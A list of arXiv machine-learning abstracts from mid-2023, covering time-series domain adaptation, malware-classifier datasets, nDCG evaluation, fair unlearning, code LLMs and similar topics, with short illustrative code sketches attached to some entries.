    Contrastive Domain Adaptation for Time-Series via Temporal Mixup. (arXiv:2212.01555v2 [cs.LG] UPDATED)
    Unsupervised Domain Adaptation (UDA) has emerged as a powerful solution for the domain shift problem via transferring the knowledge from a labeled source domain to a shifted unlabeled target domain. Despite the prevalence of UDA for visual applications, it remains relatively less explored for time-series applications. In this work, we propose a novel lightweight contrastive domain adaptation framework called CoTMix for time-series data. Unlike existing approaches that either use statistical distances or adversarial techniques, we leverage contrastive learning solely to mitigate the distribution shift across the different domains. Specifically, we propose a novel temporal mixup strategy to generate two intermediate augmented views for the source and target domains. Subsequently, we leverage contrastive learning to maximize the similarity between each domain and its corresponding augmented view. The generated views consider the temporal dynamics of time-series data during the adaptation process while inheriting the semantics among the two domains. Hence, we gradually push both domains towards a common intermediate space, mitigating the distribution shift across them. Extensive experiments conducted on five real-world time-series datasets show that our approach can significantly outperform all state-of-the-art UDA methods. The implementation code of CoTMix is available at \href{https://github.com/emadeldeen24/CoTMix}{github.com/emadeldeen24/CoTMix}.
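The temporal mixup idea can be sketched as a convex combination of a dominant-domain sample with a moving temporal average of a sample from the other domain. This is a simplified, hedged reading of the abstract; `lam`, `window`, and the padding choice are illustrative, not CoTMix's exact recipe.

```python
import numpy as np

def temporal_mixup(x_dom, x_other, lam=0.9, window=3):
    """Build a dominant-domain augmented view by mixing `x_dom` with a
    moving temporal average of `x_other`. Shapes: (timesteps, channels)."""
    T = x_other.shape[0]
    pad = window // 2
    padded = np.pad(x_other, ((pad, pad), (0, 0)), mode="edge")
    # moving average captures the other domain's local temporal dynamics
    avg = np.stack([padded[t:t + window].mean(axis=0) for t in range(T)])
    return lam * x_dom + (1 - lam) * avg

rng = np.random.default_rng(1)
x_src, x_tgt = rng.normal(size=(50, 2)), rng.normal(size=(50, 2))
src_view = temporal_mixup(x_src, x_tgt)      # source-dominant view
tgt_view = temporal_mixup(x_tgt, x_src)      # target-dominant view
assert src_view.shape == x_src.shape
```

Contrastive learning would then pull each domain towards its own augmented view, nudging both domains to a common intermediate space.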
    Decoding the Secrets of Machine Learning in Malware Classification: A Deep Dive into Datasets, Feature Extraction, and Model Performance. (arXiv:2307.14657v1 [cs.CR])
    Many studies have proposed machine-learning (ML) models for malware detection and classification, reporting an almost-perfect performance. However, they assemble ground-truth in different ways, use diverse static- and dynamic-analysis techniques for feature extraction, and even differ on what they consider a malware family. As a consequence, our community still lacks an understanding of malware classification results: whether they are tied to the nature and distribution of the collected dataset, to what extent the number of families and samples in the training dataset influence performance, and how well static and dynamic features complement each other. This work sheds light on those open questions by investigating the key factors influencing ML-based malware detection and classification. For this, we collect the largest balanced malware dataset so far with 67K samples from 670 families (100 samples each), and train state-of-the-art models for malware detection and family classification using our dataset. Our results reveal that static features perform better than dynamic features, and that combining both only provides marginal improvement over static features. We discover no correlation between packing and classification accuracy, and that missing behaviors in dynamically-extracted features highly penalize their performance. We also demonstrate how a larger number of families to classify make the classification harder, while a higher number of samples per family increases accuracy. Finally, we find that models trained on a uniform distribution of samples per family better generalize on unseen data.
    Learning locally dominant force balances in active particle systems. (arXiv:2307.14970v1 [cond-mat.soft])
    We use a combination of unsupervised clustering and sparsity-promoting inference algorithms to learn locally dominant force balances that explain macroscopic pattern formation in self-organized active particle systems. The self-organized emergence of macroscopic patterns from microscopic interactions between self-propelled particles can be widely observed in nature. Although hydrodynamic theories help us better understand the physical basis of this phenomenon, identifying a sufficient set of local interactions that shape, regulate, and sustain self-organized structures in active particle systems remains challenging. We investigate a classic hydrodynamic model of self-propelled particles that produces a wide variety of patterns, like asters and moving density bands. Our data-driven analysis shows that propagating bands are formed by local alignment interactions driven by density gradients, while steady-state asters are shaped by a mechanism of splay-induced negative compressibility arising from strong particle interactions. Our method also reveals analogous physical principles of pattern formation in a system where the speed of the particle is influenced by local density. This demonstrates the ability of our method to reveal physical commonalities across models. The physical mechanisms inferred from the data are in excellent agreement with analytical scaling arguments and experimental observations.
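A common sparsity-promoting inference scheme of the kind the abstract alludes to is sequentially thresholded least squares, which repeatedly zeroes small coefficients and refits on the surviving candidate terms, leaving only the locally dominant ones. This is a generic sketch, not the authors' specific pipeline.

```python
import numpy as np

def stlsq(library, target, threshold=0.1, iters=10):
    """Sequentially thresholded least squares: fit, zero out small
    coefficients, refit on the remaining terms, and repeat."""
    coef = np.linalg.lstsq(library, target, rcond=None)[0]
    for _ in range(iters):
        small = np.abs(coef) < threshold
        coef[small] = 0.0
        big = ~small
        if big.any():
            coef[big] = np.linalg.lstsq(library[:, big], target, rcond=None)[0]
    return coef

# Toy "force balance": the target is driven by terms 0 and 2 only.
rng = np.random.default_rng(2)
lib = rng.normal(size=(200, 5))              # library of candidate local terms
y = 2.0 * lib[:, 0] - 1.5 * lib[:, 2]
coef = stlsq(lib, y)
assert np.allclose(coef, [2.0, 0.0, -1.5, 0.0, 0.0], atol=1e-6)
```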
    On the Generalization Effects of Linear Transformations in Data Augmentation. (arXiv:2005.00695v3 [cs.LG] UPDATED)
    Data augmentation is a powerful technique to improve performance in applications such as image and text classification tasks. Yet, there is little rigorous understanding of why and how various augmentations work. In this work, we consider a family of linear transformations and study their effects on the ridge estimator in an over-parametrized linear regression setting. First, we show that transformations that preserve the labels of the data can improve estimation by enlarging the span of the training data. Second, we show that transformations that mix data can improve estimation by playing a regularization effect. Finally, we validate our theoretical insights on MNIST. Based on the insights, we propose an augmentation scheme that searches over the space of transformations by how uncertain the model is about the transformed data. We validate our proposed scheme on image and text datasets. For example, our method outperforms random sampling methods by 1.24% on CIFAR-100 using Wide-ResNet-28-10. Furthermore, we achieve comparable accuracy to the SoTA Adversarial AutoAugment on CIFAR-10, CIFAR-100, SVHN, and ImageNet datasets.
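In the over-parametrized linear setting, a label-preserving linear transformation can be written down explicitly: any matrix $F$ with $w^\top F = w^\top$ leaves the labels $y = Xw$ unchanged while the transformed rows enlarge the span of the training data. The construction below is an illustrative sketch, not the paper's.

```python
import numpy as np

rng = np.random.default_rng(6)
n, d = 5, 10                                  # over-parametrized: n < d
X = rng.normal(size=(n, d))
w = rng.normal(size=d)                        # ground-truth linear labels
y = X @ w

# Build a label-preserving transform F = I + v u^T with v ⟂ w,
# so that w·(Fx) = w·x for every input x.
v = rng.normal(size=d)
v -= (v @ w) / (w @ w) * w                    # project out the w-component
u = rng.normal(size=d)
F = np.eye(d) + np.outer(v, u)

X_aug = np.vstack([X, X @ F.T])               # augmented design matrix
y_aug = np.concatenate([y, y])                # labels preserved exactly
assert np.allclose(X @ F.T @ w, y)            # F really preserves labels
# The augmentation enlarges the span of the training data.
assert np.linalg.matrix_rank(X_aug) > np.linalg.matrix_rank(X)
```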
    On (Normalised) Discounted Cumulative Gain as an Offline Evaluation Metric for Top-$n$ Recommendation. (arXiv:2307.15053v1 [cs.IR])
    Approaches to recommendation are typically evaluated in one of two ways: (1) via a (simulated) online experiment, often seen as the gold standard, or (2) via some offline evaluation procedure, where the goal is to approximate the outcome of an online experiment. Several offline evaluation metrics have been adopted in the literature, inspired by ranking metrics prevalent in the field of Information Retrieval. (Normalised) Discounted Cumulative Gain (nDCG) is one such metric that has seen widespread adoption in empirical studies, and higher (n)DCG values have been used to present new methods as the state-of-the-art in top-$n$ recommendation for many years. Our work takes a critical look at this approach, and investigates when we can expect such metrics to approximate the gold standard outcome of an online experiment. We formally present the assumptions that are necessary to consider DCG an unbiased estimator of online reward and provide a derivation for this metric from first principles, highlighting where we deviate from its traditional uses in IR. Importantly, we show that normalising the metric renders it inconsistent, in that even when DCG is unbiased, ranking competing methods by their normalised DCG can invert their relative order. Through a correlation analysis between off- and on-line experiments conducted on a large-scale recommendation platform, we show that our unbiased DCG estimates strongly correlate with online reward, even when some of the metric's inherent assumptions are violated. This statement no longer holds for its normalised variant, suggesting that nDCG's practical utility may be limited.
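The claimed inconsistency of normalisation is easy to reproduce with hypothetical numbers: averaged over two queries, unnormalised DCG can prefer one method while per-query normalisation (nDCG) prefers the other, because each query contributes with a different ideal-DCG denominator.

```python
import numpy as np

def dcg(gains):
    """Unnormalised DCG with the standard log2 rank discount."""
    gains = np.asarray(gains, dtype=float)
    return float((gains / np.log2(np.arange(2, len(gains) + 2))).sum())

# Hypothetical per-query DCG values for two methods, plus each query's
# ideal DCG (IDCG); every value satisfies DCG <= IDCG.
dcg_a = np.array([1.0, 0.5])
dcg_b = np.array([0.5, 1.2])
idcg  = np.array([1.0, 3.0])

# Averaged over queries, raw DCG ranks method B above method A ...
assert dcg_b.mean() > dcg_a.mean()
# ... but normalising per query first (nDCG) inverts the ordering.
assert (dcg_a / idcg).mean() > (dcg_b / idcg).mean()
```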
    Dynamics of specialization in neural modules under resource constraints. (arXiv:2106.02626v2 [q-bio.NC] UPDATED)
    It has long been believed that the brain is highly modular both in terms of structure and function, although recent evidence has led some to question the extent of both types of modularity. We used artificial neural networks to test the hypothesis that structural modularity is sufficient to guarantee functional specialization, and find that in general, this does not necessarily hold except at extreme levels. We then systematically tested which features of the environment and network do lead to the emergence of specialization. We used a simple toy environment, task and network, allowing us precise control, and show that in this setup, several distinct measures of specialization give qualitatively similar results. We further find that (1) specialization can only emerge in environments where features of that environment are meaningfully separable, (2) specialization preferentially emerges when the network is strongly resource-constrained, and (3) these findings are qualitatively similar across different network architectures, but the quantitative relationships depend on the architecture type. Finally, we show that functional specialization varies dynamically across time, and demonstrate that these dynamics depend on both the timing and bandwidth of information flow in the network. We conclude that a static notion of specialization, based on structural modularity, is likely too simple a framework for understanding intelligent systems in situations of real-world complexity. We propose that thoroughly stress testing candidate definitions of functional modularity in simplified scenarios before extending to more complex data, network models and electrophysiological recordings is likely to be a fruitful approach.
    Learning Task Automata for Reinforcement Learning using Hidden Markov Models. (arXiv:2208.11838v3 [cs.LG] UPDATED)
    Training reinforcement learning (RL) agents using scalar reward signals is often infeasible when an environment has sparse and non-Markovian rewards. Moreover, handcrafting these reward functions before training is prone to misspecification, especially when the environment's dynamics are only partially known. This paper proposes a novel pipeline for learning non-Markovian task specifications as succinct finite-state `task automata' from episodes of agent experience within unknown environments. We leverage two key algorithmic insights. First, we learn a product MDP, a model composed of the specification's automaton and the environment's MDP (both initially unknown), by treating the product MDP as a partially observable MDP and using the well-known Baum-Welch algorithm for learning hidden Markov models. Second, we propose a novel method for distilling the task automaton (assumed to be a deterministic finite automaton) from the learnt product MDP. Our learnt task automaton enables the decomposition of a task into its constituent sub-tasks, which improves the rate at which an RL agent can later synthesise an optimal policy. It also provides an interpretable encoding of high-level environmental and task features, so a human can readily verify that the agent has learnt coherent tasks with no misspecifications. In addition, we take steps towards ensuring that the learnt automaton is environment-agnostic, making it well-suited for use in transfer learning. Finally, we provide experimental results compared with two baselines to illustrate our algorithm's performance in different environments and tasks.
    Pruning Distorted Images in MNIST Handwritten Digits. (arXiv:2307.14343v1 [cs.CV])
    Recognizing handwritten digits is a challenging task primarily due to the diversity of writing styles and the presence of noisy images. The widely used MNIST dataset, which is commonly employed as a benchmark for this task, includes distorted digits with irregular shapes, incomplete strokes, and varying skew in both the training and testing datasets. Consequently, these factors contribute to reduced accuracy in digit recognition. To overcome this challenge, we propose a two-stage deep learning approach. In the first stage, we create a simple neural network to identify distorted digits within the training set. This model serves to detect and filter out such distorted and ambiguous images. In the second stage, we exclude these identified images from the training dataset and proceed to retrain the model using the filtered dataset. This process aims to improve the classification accuracy and confidence levels while mitigating issues of underfitting and overfitting. Our experimental results demonstrate the effectiveness of the proposed approach, achieving an accuracy rate of over 99.5% on the testing dataset. This significant improvement showcases the potential of our method in enhancing digit classification accuracy. In our future work, we intend to explore the scalability of this approach and investigate techniques to further enhance accuracy by reducing the size of the training data.
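The two-stage filtering can be sketched with a confidence threshold: the stage-one model's predicted class probabilities flag low-confidence training images as distorted, and those are dropped before retraining. The threshold and the tiny arrays below are illustrative, not the paper's exact criterion.

```python
import numpy as np

def prune_training_set(images, labels, probs, threshold=0.6):
    """Stage 1 (sketch): `probs` holds a first model's class probabilities
    for each training image. Images the model is unsure about (max
    probability below `threshold`) are treated as distorted and dropped."""
    keep = probs.max(axis=1) >= threshold
    return images[keep], labels[keep]

rng = np.random.default_rng(3)
images = rng.normal(size=(6, 784))            # six flattened 28x28 images
labels = np.array([0, 1, 2, 3, 4, 5])
probs = np.array([[0.90, 0.10], [0.55, 0.45], [0.80, 0.20],
                  [0.50, 0.50], [0.70, 0.30], [0.95, 0.05]])
kept_x, kept_y = prune_training_set(images, labels, probs)
assert list(kept_y) == [0, 2, 4, 5]           # the two ambiguous images are gone
```

Stage 2 would then retrain the classifier on `kept_x`, `kept_y`.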
    Towards Practicable Sequential Shift Detectors. (arXiv:2307.14758v1 [cs.LG])
    There is a growing awareness of the harmful effects of distribution shift on the performance of deployed machine learning models. Consequently, there is a growing interest in detecting these shifts before associated costs have time to accumulate. However, desiderata of crucial importance to the practicable deployment of sequential shift detectors are typically overlooked by existing works, precluding their widespread adoption. We identify three such desiderata, highlight existing works relevant to their satisfaction, and recommend impactful directions for future research.
    Auto-Tables: Synthesizing Multi-Step Transformations to Relationalize Tables without Using Examples. (arXiv:2307.14565v1 [cs.DB])
    Relational tables, where each row corresponds to an entity and each column corresponds to an attribute, have been the standard for tables in relational databases. However, such a standard cannot be taken for granted when dealing with tables "in the wild". Our survey of real spreadsheet-tables and web-tables shows that over 30% of such tables do not conform to the relational standard, for which complex table-restructuring transformations are needed before these tables can be queried easily using SQL-based analytics tools. Unfortunately, the required transformations are non-trivial to program, which has become a substantial pain point for technical and non-technical users alike, as evidenced by large numbers of forum questions in places like StackOverflow and Excel/Tableau forums. We develop an Auto-Tables system that can automatically synthesize pipelines with multi-step transformations (in Python or other languages), to transform non-relational tables into standard relational forms for downstream analytics, obviating the need for users to manually program transformations. We compile an extensive benchmark for this new task, by collecting 194 real test cases from user spreadsheets and online forums. Our evaluation suggests that Auto-Tables can successfully synthesize transformations for over 70% of test cases at interactive speeds, without requiring any input from users, making this an effective tool for both technical and non-technical users to prepare data for analytics.
    Speed Limits for Deep Learning. (arXiv:2307.14653v1 [stat.ML])
    State-of-the-art neural networks require extreme computational power to train. It is therefore natural to wonder whether they are optimally trained. Here we apply a recent advancement in stochastic thermodynamics which allows bounding the speed at which one can go from the initial weight distribution to the final distribution of the fully trained network, based on the ratio of their Wasserstein-2 distance and the entropy production rate of the dynamical process connecting them. Considering both gradient-flow and Langevin training dynamics, we provide analytical expressions for these speed limits for linear and linearizable neural networks, e.g. the Neural Tangent Kernel (NTK). Remarkably, given some plausible scaling assumptions on the NTK spectra and the spectral decomposition of the labels, learning is optimal in a scaling sense. Our results are consistent with small-scale experiments with Convolutional Neural Networks (CNNs) and Fully Connected Neural networks (FCNs) on CIFAR-10, showing a short highly non-optimal regime followed by a longer optimal regime.
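One common form of the stochastic-thermodynamic speed limit invoked here (stated in hedged form; constants and conventions vary across formulations, and this may differ from the paper's exact statement) bounds the training time $T$ by the Wasserstein-2 distance between the initial and final weight distributions and the total entropy production $\Sigma_T$:

```latex
\Sigma_T \;\ge\; \frac{\mathcal{W}_2^2(\rho_0,\rho_T)}{T}
\qquad\Longleftrightarrow\qquad
T \;\ge\; \frac{\mathcal{W}_2^2(\rho_0,\rho_T)}{\Sigma_T}.
```

Training is then "optimal" in this sense when the bound is approximately saturated, which is what the abstract's scaling argument addresses.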
    Fair Machine Unlearning: Data Removal while Mitigating Disparities. (arXiv:2307.14754v1 [cs.LG])
    As public consciousness regarding the collection and use of personal information by corporations grows, it is of increasing importance that consumers be active participants in the curation of corporate datasets. In light of this, data governance frameworks such as the General Data Protection Regulation (GDPR) have outlined the right to be forgotten as a key principle allowing individuals to request that their personal data be deleted from the databases and models used by organizations. To achieve forgetting in practice, several machine unlearning methods have been proposed to address the computational inefficiencies of retraining a model from scratch with each unlearning request. While these methods are efficient online alternatives to retraining, it is unclear how they impact other properties critical to real-world applications, such as fairness. In this work, we propose the first fair machine unlearning method that can provably and efficiently unlearn data instances while preserving group fairness. We derive theoretical results which demonstrate that our method can provably unlearn data instances while maintaining fairness objectives. Extensive experimentation with real-world datasets highlights the efficacy of our method at unlearning data instances while preserving fairness.
    A Transformer-based Approach for Arabic Offline Handwritten Text Recognition. (arXiv:2307.15045v1 [cs.CV])
    Handwriting recognition is a challenging and critical problem in the fields of pattern recognition and machine learning, with applications spanning a wide range of domains. In this paper, we focus on the specific issue of recognizing offline Arabic handwritten text. Existing approaches typically utilize a combination of convolutional neural networks for image feature extraction and recurrent neural networks for temporal modeling, with connectionist temporal classification used for text generation. However, these methods suffer from a lack of parallelization due to the sequential nature of recurrent neural networks. Furthermore, these models cannot account for linguistic rules, necessitating the use of an external language model in the post-processing stage to boost accuracy. To overcome these issues, we introduce two alternative architectures, namely the Transformer Transducer and the standard sequence-to-sequence Transformer, and compare their performance in terms of accuracy and speed. Our approach can model language dependencies and relies only on the attention mechanism, thereby making it more parallelizable and less complex. We employ pre-trained Transformers for both image understanding and language modeling. Our evaluation on the Arabic KHATT dataset demonstrates that our proposed method outperforms the current state-of-the-art approaches for recognizing offline Arabic handwritten text.
    TimeGNN: Temporal Dynamic Graph Learning for Time Series Forecasting. (arXiv:2307.14680v1 [cs.LG])
    Time series forecasting lies at the core of important real-world applications in many fields of science and engineering. The abundance of large time series datasets that consist of complex patterns and long-term dependencies has led to the development of various neural network architectures. Graph neural network approaches, which jointly learn a graph structure based on the correlation of raw values of multivariate time series while forecasting, have recently seen great success. However, such solutions are often costly to train and difficult to scale. In this paper, we propose TimeGNN, a method that learns dynamic temporal graph representations that can capture the evolution of inter-series patterns along with the correlations of multiple series. TimeGNN achieves inference times 4 to 80 times faster than other state-of-the-art graph-based methods while achieving comparable forecasting performance.
    Emotion4MIDI: a Lyrics-based Emotion-Labeled Symbolic Music Dataset. (arXiv:2307.14783v1 [eess.AS])
    We present a new large-scale emotion-labeled symbolic music dataset consisting of 12k MIDI songs. To create this dataset, we first trained emotion classification models on the GoEmotions dataset, achieving state-of-the-art results with a model half the size of the baseline. We then applied these models to lyrics from two large-scale MIDI datasets. Our dataset covers a wide range of fine-grained emotions, providing a valuable resource to explore the connection between music and emotions and, especially, to develop models that can generate music based on specific emotions. Our code for inference, trained models, and datasets are available online.
    Compositional federated learning: Applications in distributionally robust averaging and meta learning. (arXiv:2106.11264v3 [cs.LG] UPDATED)
    In the paper, we propose an effective and efficient Compositional Federated Learning (ComFedL) algorithm for solving a new compositional Federated Learning (FL) framework, which frequently appears in many data mining and machine learning problems with a hierarchical structure such as distributionally robust FL and model-agnostic meta learning (MAML). Moreover, we study the convergence analysis of our ComFedL algorithm under some mild conditions, and prove that it achieves a convergence rate of $O(\frac{1}{\sqrt{T}})$, where $T$ denotes the number of iterations. To the best of our knowledge, our new Compositional FL framework is the first work to bridge federated learning with composition stochastic optimization. In particular, we first transform the distributionally robust FL (i.e., a minimax optimization problem) into a simple composition optimization problem by using KL divergence regularization. At the same time, we also first transform the distribution-agnostic MAML problem (i.e., a minimax optimization problem) into a simple yet effective composition optimization problem. Finally, we apply our algorithm to two popular machine learning tasks, i.e., distributionally robust FL and MAML, to demonstrate its effectiveness.
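The transformation of KL-regularized distributionally robust FL into a composition problem can be sketched via a standard log-sum-exp identity (this is the generic identity, not necessarily the paper's exact formulation): for local losses $F_i(w)$ and regularization weight $\lambda > 0$,

```latex
\min_w \max_{p \in \Delta_n} \sum_{i=1}^n p_i F_i(w)
  - \lambda\, \mathrm{KL}\!\left(p \,\middle\|\, \tfrac{1}{n}\mathbf{1}\right)
\;=\;
\min_w \; \lambda \log\!\Big(\frac{1}{n}\sum_{i=1}^n \exp\big(F_i(w)/\lambda\big)\Big),
```

a composition of an outer $\log$ with an inner expectation, which is exactly the structure that compositional stochastic optimization handles.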
    MATNilm: Multi-appliance-task Non-intrusive Load Monitoring with Limited Labeled Data. (arXiv:2307.14778v1 [cs.LG])
    Non-intrusive load monitoring (NILM) identifies the status and power consumption of various household appliances by disaggregating the total power usage signal of an entire house. Efficient and accurate load monitoring facilitates user profile establishment, intelligent household energy management, and peak load shifting. This is beneficial for both the end-users and utilities by improving the overall efficiency of a power distribution network. Existing approaches mainly focus on developing an individual model for each appliance. Those approaches typically rely on a large amount of household-labeled data which is hard to collect. In this paper, we propose a multi-appliance-task framework with a training-efficient sample augmentation (SA) scheme that boosts the disaggregation performance with limited labeled data. For each appliance, we develop a shared-hierarchical split structure for its regression and classification tasks. In addition, we also propose a two-dimensional attention mechanism in order to capture spatio-temporal correlations among all appliances. With only one-day training data and limited appliance operation profiles, the proposed SA algorithm can achieve comparable test performance to the case of training with the full dataset. Finally, simulation results show that our proposed approach features a significantly improved performance over many baseline models. The relative errors can be reduced by more than 50\% on average. The codes of this work are available at https://github.com/jxiong22/MATNilm.
    Scaling Session-Based Transformer Recommendations using Optimized Negative Sampling and Loss Functions. (arXiv:2307.14906v1 [cs.IR])
    This work introduces TRON, a scalable session-based Transformer Recommender using Optimized Negative-sampling. Motivated by the scalability and performance limitations of prevailing models such as SASRec and GRU4Rec+, TRON integrates top-k negative sampling and listwise loss functions to enhance its recommendation accuracy. Evaluations on relevant large-scale e-commerce datasets show that TRON improves upon the recommendation quality of current methods while maintaining training speeds similar to SASRec. A live A/B test yielded an 18.14% increase in click-through rate over SASRec, highlighting the potential of TRON in practical settings. For further research, we provide access to our source code at https://github.com/otto-de/TRON and an anonymized dataset at https://github.com/otto-de/recsys-dataset.
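Top-k negative sampling with a listwise loss can be sketched as: sample many negatives, keep only the k highest-scoring ("hardest") ones, and apply softmax cross-entropy with the positive item as the target. The function below is an illustrative reading of the abstract, not TRON's implementation.

```python
import numpy as np

def listwise_loss_topk(pos_score, neg_scores, k=3):
    """Listwise (softmax cross-entropy) loss over the positive item and
    the top-k highest-scoring sampled negatives. Illustrative only."""
    hard = np.sort(neg_scores)[-k:]            # keep the k "hardest" negatives
    logits = np.concatenate(([pos_score], hard))
    # cross-entropy with the positive at index 0
    return float(np.log(np.exp(logits).sum()) - pos_score)

rng = np.random.default_rng(4)
neg_scores = rng.normal(size=100)              # scores of sampled negatives
loss = listwise_loss_topk(pos_score=2.0, neg_scores=neg_scores, k=3)
assert loss > 0.0                              # always positive; shrinks as the positive dominates
```

Restricting the loss to the hardest negatives keeps the gradient informative while avoiding a full softmax over the entire item catalogue.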
    CAR-DESPOT: Causally-Informed Online POMDP Planning for Robots in Confounded Environments. (arXiv:2304.06848v3 [cs.RO] UPDATED)
    Robots operating in real-world environments must reason about possible outcomes of stochastic actions and make decisions based on partial observations of the true world state. A major challenge for making accurate and robust action predictions is the problem of confounding, which if left untreated can lead to prediction errors. The partially observable Markov decision process (POMDP) is a widely-used framework to model these stochastic and partially-observable decision-making problems. However, due to a lack of explicit causal semantics, POMDP planning methods are prone to confounding bias and thus in the presence of unobserved confounders may produce underperforming policies. This paper presents a novel causally-informed extension of "anytime regularized determinized sparse partially observable tree" (AR-DESPOT), a modern anytime online POMDP planner, using causal modelling and inference to eliminate errors caused by unmeasured confounder variables. We further propose a method to learn offline the partial parameterisation of the causal model for planning, from ground truth model data. We evaluate our methods on a toy problem with an unobserved confounder and show that the learned causal model is highly accurate, while our planning method is more robust to confounding and produces overall higher performing policies than AR-DESPOT.
    Take-A-Photo: 3D-to-2D Generative Pre-training of Point Cloud Models. (arXiv:2307.14971v1 [cs.CV])
    With the overwhelming trend of mask image modeling led by MAE, generative pre-training has shown a remarkable potential to boost the performance of fundamental models in 2D vision. However, in 3D vision, the over-reliance on Transformer-based backbones and the unordered nature of point clouds have restricted the further development of generative pre-training. In this paper, we propose a novel 3D-to-2D generative pre-training method that is adaptable to any point cloud model. We propose to generate view images from different instructed poses via the cross-attention mechanism as the pre-training scheme. Generating view images has more precise supervision than its point cloud counterpart, thus assisting 3D backbones to have a finer comprehension of the geometrical structure and stereoscopic relations of the point cloud. Experimental results have proved the superiority of our proposed 3D-to-2D generative pre-training over previous pre-training methods. Our method is also effective in boosting the performance of architecture-oriented approaches, achieving state-of-the-art performance when fine-tuning on ScanObjectNN classification and ShapeNetPart segmentation tasks. Code is available at https://github.com/wangzy22/TAP.
    A Self-Adaptive Penalty Method for Integrating Prior Knowledge Constraints into Neural ODEs. (arXiv:2307.14940v1 [cs.LG])
    The continuous dynamics of natural systems have been effectively modelled using Neural Ordinary Differential Equations (Neural ODEs). However, for accurate and meaningful predictions, it is crucial that the models follow the underlying rules or laws that govern these systems. In this work, we propose a self-adaptive penalty algorithm for Neural ODEs to enable modelling of constrained natural systems. The proposed self-adaptive penalty function can dynamically adjust the penalty parameters. The explicit introduction of prior knowledge helps to increase the interpretability of Neural ODE-based models. We validate the proposed approach by modelling three natural systems with prior knowledge constraints: population growth, chemical reaction evolution, and damped harmonic oscillator motion. The numerical experiments, together with a comparison against other penalty Neural ODE approaches and the \emph{vanilla} Neural ODE, demonstrate the effectiveness of the proposed self-adaptive penalty algorithm for Neural ODEs in modelling constrained natural systems. Moreover, the self-adaptive penalty approach provides more accurate and robust models with reliable and meaningful predictions.
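A generic self-adaptive penalty scheme of the kind described can be sketched as: add a weighted constraint-violation term to the data loss, and grow the weight whenever the violation stops decreasing. The `growth` and `tol` values below are illustrative choices, not the paper's schedule.

```python
def penalised_loss(data_loss, violation, mu):
    """Total objective: data fit plus a penalty on how strongly the
    prior-knowledge constraints are violated."""
    return data_loss + mu * violation

def adapt_penalty(mu, violation, prev_violation, growth=2.0, tol=0.9):
    """Self-adaptive update (sketch): if the constraint violation has not
    decreased enough since the last check, increase the penalty weight."""
    return mu * growth if violation > tol * prev_violation else mu

mu = 1.0
mu = adapt_penalty(mu, violation=0.95, prev_violation=1.0)   # stalled -> grow
assert mu == 2.0
mu = adapt_penalty(mu, violation=0.5, prev_violation=0.95)   # improving -> keep
assert mu == 2.0
```

In a Neural ODE, `violation` would be evaluated on the integrated trajectory (e.g. negativity of a population, mass-balance error).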
    Multi-Source Domain Adaptation through Dataset Dictionary Learning in Wasserstein Space. (arXiv:2307.14953v1 [cs.LG])
    This paper seeks to solve Multi-Source Domain Adaptation (MSDA), which aims to mitigate data distribution shifts when transferring knowledge from multiple labeled source domains to an unlabeled target domain. We propose a novel MSDA framework based on dictionary learning and optimal transport. We interpret each domain in MSDA as an empirical distribution. As such, we express each domain as a Wasserstein barycenter of dictionary atoms, which are empirical distributions. We propose a novel algorithm, DaDiL, for learning via mini-batches: (i) atom distributions; (ii) a matrix of barycentric coordinates. Based on our dictionary, we propose two novel methods for MSDA: DaDil-R, based on the reconstruction of labeled samples in the target domain, and DaDiL-E, based on the ensembling of classifiers learned on atom distributions. We evaluate our methods in 3 benchmarks: Caltech-Office, Office 31, and CWRU, where we improved previous state-of-the-art by 3.15%, 2.29%, and 7.71% in classification performance. Finally, we show that interpolations in the Wasserstein hull of learned atoms provide data that can generalize to the target domain.
    Fading memory as inductive bias in residual recurrent networks. (arXiv:2307.14823v1 [cs.LG])
    Residual connections have been proposed as architecture-based inductive bias to mitigate the problem of exploding and vanishing gradients and increase task performance in both feed-forward and recurrent networks (RNNs) when trained with the backpropagation algorithm. Yet, little is known about how residual connections in RNNs influence their dynamics and fading memory properties. Here, we introduce weakly coupled residual recurrent networks (WCRNNs) in which residual connections result in well-defined Lyapunov exponents and allow for studying properties of fading memory. We investigate how the residual connections of WCRNNs influence their performance, network dynamics, and memory properties on a set of benchmark tasks. We show that several distinct forms of residual connections yield effective inductive biases that result in increased network expressivity. In particular, residual connections that (i) result in network dynamics at the proximity of the edge of chaos, (ii) allow networks to capitalize on characteristic spectral properties of the data, and (iii) result in heterogeneous memory properties are shown to increase practical expressivity. In addition, we demonstrate how our results can be extended to non-linear residuals and introduce a weakly coupled residual initialization scheme that can be used for Elman RNNs.
    PanGu-Coder2: Boosting Large Language Models for Code with Ranking Feedback. (arXiv:2307.14936v1 [cs.CL])
    Large Language Models for Code (Code LLM) are flourishing. New and powerful models are released on a weekly basis, demonstrating remarkable performance on the code generation task. Various approaches have been proposed to boost the code generation performance of pre-trained Code LLMs, such as supervised fine-tuning, instruction tuning, reinforcement learning, etc. In this paper, we propose a novel RRTF (Rank Responses to align Test&Teacher Feedback) framework, which can effectively and efficiently boost pre-trained large language models for code generation. Under this framework, we present PanGu-Coder2, which achieves 62.20% pass@1 on the OpenAI HumanEval benchmark. Furthermore, through an extensive evaluation on CoderEval and LeetCode benchmarks, we show that PanGu-Coder2 consistently outperforms all previous Code LLMs.
    CodeLens: An Interactive Tool for Visualizing Code Representations. (arXiv:2307.14902v1 [cs.SE])
    Representing source code in a generic input format is crucial to automate software engineering tasks, e.g., applying machine learning algorithms to extract information. Visualizing code representations can further enable human experts to gain an intuitive insight into the code. Unfortunately, as of today, there is no universal tool that can simultaneously visualize different types of code representations. In this paper, we introduce a tool, CodeLens, which provides a visual interaction environment that supports various representation methods and helps developers understand and explore them. CodeLens is designed to support multiple programming languages, such as Java, Python, and JavaScript, and four types of code representations, including sequence of tokens, abstract syntax tree (AST), data flow graph (DFG), and control flow graph (CFG). By using CodeLens, developers can quickly visualize the specific code representation and also obtain the represented inputs for models of code. The Web-based interface of CodeLens is available at this http URL. The demonstration video can be found at this http URL
    Verifiable Feature Attributions: A Bridge between Post Hoc Explainability and Inherent Interpretability. (arXiv:2307.15007v1 [cs.LG])
